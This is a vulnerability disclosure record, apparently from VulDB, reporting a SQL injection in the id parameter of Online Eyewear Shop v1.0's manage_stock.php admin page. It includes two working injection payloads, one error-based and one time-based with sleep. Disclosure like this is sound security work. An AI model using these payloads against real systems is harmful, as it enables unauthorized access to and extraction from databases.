| Title | Online Eyewear Shop v1.0 /oews/admin/inventory/manage_stock.php GET parameter id exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in Online Eyewear Shop v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /oews/admin/inventory/manage_stock.php?id.
Payload1:id=1' and (select 1 from(select count(*),concat(0x61626364,(select (elt(999=999,1))),0x75767778,floor(rand(0)*2))x from information_schema.plugins group by x)a)-- a
Payload2:id=1' and (select 1 from (select(sleep(5)))a)-- a |
|---|
| Source | ⚠️ https://github.com/Gear-D/bug_report/blob/main/SQLi-1.md |
|---|
| User | Gear-D (UID 44628) |
|---|
| Submission | 04/10/2023 08:50 (3 years ago) |
|---|
| Moderation | 04/10/2023 17:45 (9 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 225406 [SourceCodester Online Eyewear Shop 1.0 GET Parameter manage_stock.php ID sql injection] |
|---|
| Points | 20 |
|---|